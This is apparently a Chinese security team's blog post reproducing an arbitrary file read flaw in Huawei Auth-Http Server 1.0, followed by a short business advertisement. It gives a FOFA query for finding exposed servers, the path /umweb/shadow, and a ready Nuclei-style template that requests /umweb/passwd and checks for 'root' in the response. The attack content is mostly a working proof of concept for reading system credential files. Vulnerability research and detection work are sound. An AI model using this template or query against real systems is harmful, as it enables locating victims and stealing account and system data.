华为Auth-Http Serve任意文件读取漏洞复现

网络安全交流圈 青澜安全团队 2023-11-24 17:49

---

漏洞描述：

Huawei Auth-Http任意文件泄露漏洞，攻击者可构造恶意请求获取系统信息等及其它安全风险。

FOFA:

server="Huawei Auth-Http Server 1.0"

---

POC：来源于互联网

/umweb/shadow

id: huanwei-auth-http-server-fileread

info:
name: 华为Auth-Http Server 1.0任意文件读取
author:
severity: medium
description: 华为Auth-Http Server 1.0任意文件读取，攻击者可通过此漏洞获取敏感信息。

reference:
- https://
metadata:
fofa-query: server="Huawei Auth-Http Server 1.0"
verified: true
max-request: 1

http:
- raw:
- |
GET /umweb/passwd HTTP/1.1
Host: {{Hostname}}


matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"root")'

欢迎添加微信进行业务咨询：

承接以下业务：